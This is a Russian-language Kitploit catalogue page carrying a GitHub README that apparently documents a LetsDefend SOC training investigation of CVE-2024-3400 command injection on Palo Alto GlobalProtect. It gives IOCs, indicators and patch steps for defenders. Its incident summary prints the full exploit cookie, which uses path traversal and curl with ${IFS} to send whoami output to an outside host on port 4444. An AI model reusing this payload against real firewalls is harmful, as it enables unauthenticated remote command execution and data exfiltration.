Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
letsdefend-cve2024-3400-case-study — Стратегии обнаружения, анализа и реагирования на попытки эксплуатации CVE-2024-3400, нацеленные на порталы GlobalProtect Palo Alto PAN-OS. Включает IOCs, паттерны эксплойтов и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Управление индикаторами компрометации (IOC)Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФорензикаЦифровая криминалистикаКомандование и УправлениеРазведка угрозОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Реагирование на Инциденты
Анализ Журналов
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Стратегии обнаружения, анализа и реагирования на попытки эксплуатации CVE-2024-3400, нацеленные на порталы GlobalProtect Palo Alto PAN-OS. Включает IOCs, паттерны эксплойтов и рекомендации по смягчению последствий.

Репозиторий
1 год назадЕщё не проверено

letsdefend-cve2024-3400-case-study

Стратегии обнаружения, анализа и реагирования на попытки эксплуатации CVE-2024-3400, направленные на порталы GlobalProtect в Palo Alto PAN-OS. Включает индикаторы компрометации (IOC), паттерны эксплуатации и рекомендации по смягчению последствий.

Расследование инцидента CVE-2024-3400

🔍 Обзор

Этот репозиторий содержит подробное расследование и анализ угрозы CVE-2024-3400 — критической уязвимости неаутентифицированной инъекции команд, затрагивающей программное обеспечение Palo Alto Networks PAN-OS и нацеленной на портал GlobalProtect.

18 апреля 2024 года была обнаружена активность эксплуатации уязвимости, направленная на внутренний межсетевой экран PAN-OS, с использованием уязвимой конечной точки /global-protect/login.esp. Злоумышленник использовал сформированный cookie SESSID, содержащий команду curl, выполняемую через обратные кавычки, для обращения к удалённому C2-серверу, размещённому на 144.172.79.92 (Майами, Флорида). Полезная нагрузка эксплойта использовала ${IFS} для обхода простых фильтров и телеметрический каталог PAN-OS для размещения вредоносной активности. Межсетевой экран ответил кодом 200 OK, что указывает на вероятное успешное выполнение полезной нагрузки.

Обзор инцидента

📄 Сводка по инциденту

  • Идентификатор события: 249

  • Правило обнаружения: SOC274 – PAN-OS Command Injection Exploitation

  • Время события: 18 апреля 2024 г., 03:09 UTC

  • Имя хоста: PA-Firewall-01

  • IP-адрес назначения: 172.16.17.139

  • IP-адрес источника: 144.172.79.92

  • Метод запроса: POST

  • Конечная точка: /global-protect/login.esp

  • Полезная нагрузка cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Вредоносные хэши:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • : (выполнен с помощью )

🧠 Аналитика угроз

Аналитика угроз

Шаг 1: Первичное обнаружение эксплойта с помощью поиска на malpedia

Шаг расследования 1

Шаг 2: Анализ и исследование хэша

Шаг расследования 2

Шаг 3: Дополнительное исследование

Шаг расследования 3

Шаг 4: Исследование IP-адреса

Шаг расследования 4

🧠 Поведенческие индикаторы

  • Использование SESSID для инъекции команд
  • Использование ${IFS} для обхода фильтров
  • Размещение полезной нагрузки в каталоге /opt/panlogs/tmp/device_telemetry
  • Участие процесса dt_send после эксплуатации
  • Сетевое обращение к IP-адресу злоумышленника на порту 4444

📄 Данные журналов

Пример журнала


🧩 Корреляция хэшей

Совпадение хэша


✅ Полученные баллы LetsDefend

Ключевые моменты

🚨 Воздействие

  • Удалённое неаутентифицированное выполнение команд на ключевом устройстве безопасности
  • Возможная загрузка и выполнение Python-полезной нагрузки, контролируемой злоумышленником
  • Использование внутренних телеметрических механизмов PAN-OS для размещения или эксфильтрации данных
  • Разрешённый трафик с известного вредоносного IP-адреса

✅ Рекомендуемые действия по реагированию

  1. Обновите PAN-OS до версий: 10.2.9-h1, 11.0.4-h1 или 11.1.2-h3
  2. Заблокируйте вредоносный IP-адрес: 144.172.79.92
  3. Выполните поиск индикаторов компрометации (IOC) в журналах и файловых системах
  4. Проверьте телеметрические каталоги на наличие подозрительных файлов или признаков выполнения
  5. Изолируйте затронутые системы и проведите полный криминалистический анализ

📁 Содержимое

  • logs/: Обработанные и необработанные журналы обнаружения
  • ioc/: Хэши файлов и IP-адреса, связанные с атакой
  • analysis/: Детальный анализ поведения эксплойта и трассировка процессов
  • report/: Сводка и изображения журналов и кодов моих исследований

Что такое CVE-2024-3400

CVE-2024-3400 — это критическая уязвимость в Palo Alto Networks PAN-OS, затрагивающая, в частности, шлюзы GlobalProtect. Ниже приведено описание того, что о ней известно публично:

🔥 CVE-2024-3400 – Уязвимость инъекции команд в Palo Alto PAN-OS

Показатель CVSS: 10.0 (критическая)

Опубликовано: апрель 2024 г.

Затронутые продукты: PAN-OS 10.2, 11.0 и 11.1 при включённом GlobalProtect.

Эксплуатация: подтверждена в реальных атаках (zero-day)

Тип уязвимости: неаутентифицированная инъекция команд

🧠 В чём риск?

CVE-2024-3400 позволяет неаутентифицированным злоумышленникам выполнять произвольные команды в операционной системе межсетевого экрана. По сути, это даёт полный контроль над затронутыми устройствами без необходимости учётных данных — серьёзная точка компрометации для любого предприятия, полагающегося на межсетевые экраны Palo Alto.

⚠️ Условия, необходимые для эксплуатации:

Шлюз GlobalProtect должен быть включён.

Определённые версии PAN-OS (10.2.x, 11.0.x, 11.1.x).

Эксплуатация возможна через интернет, если устройство не находится за дополнительными уровнями защиты.

🔎 Что делают злоумышленники:

Отправка специально сформированных запросов для эксплуатации дефекта инъекции.

Развёртывание удалённых оболочек или загрузка полезных нагрузок второй стадии.

Наблюдаемое поведение включает:

Выполнение команд через специально сформированные URL-адреса

Механизмы закрепления в системе

Горизонтальное перемещение внутри сетей

🛡️ Меры по смягчению последствий и рекомендации:

Немедленно установите обновления: Palo Alto выпустила исправления; обновитесь до не уязвимых версий (например, 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 или более поздних).

Проверьте наличие индикаторов компрометации (IOC), таких как подозрительные процессы, исходящие подключения или необычная история CLI.

Используйте такие инструменты, как Shodan, или инвентаризацию активов для поиска уязвимых устройств.

🛠️ Как проводить расследование (например, через LetsDefend или SIEM):

Ищите внешние IP-адреса, обращающиеся к GlobalProtect без действительной аутентификации.

Проверяйте журналы на предмет подозрительного выполнения команд (show system processes, cat /etc/passwd и т. д.).

Отслеживайте поведение межсетевого экрана и создавайте оповещения об аномальных исходящих подключениях.

Этот репозиторий служит одновременно внутренним отчётом о расследовании и образовательным ресурсом для защитников, стремящихся понять реальную эксплуатацию уязвимостей PAN-OS. Приветствуются вклад и дополнительные наблюдения.

Скачать инструмент
Вредоносный скрипт
update.py
/usr/bin/python3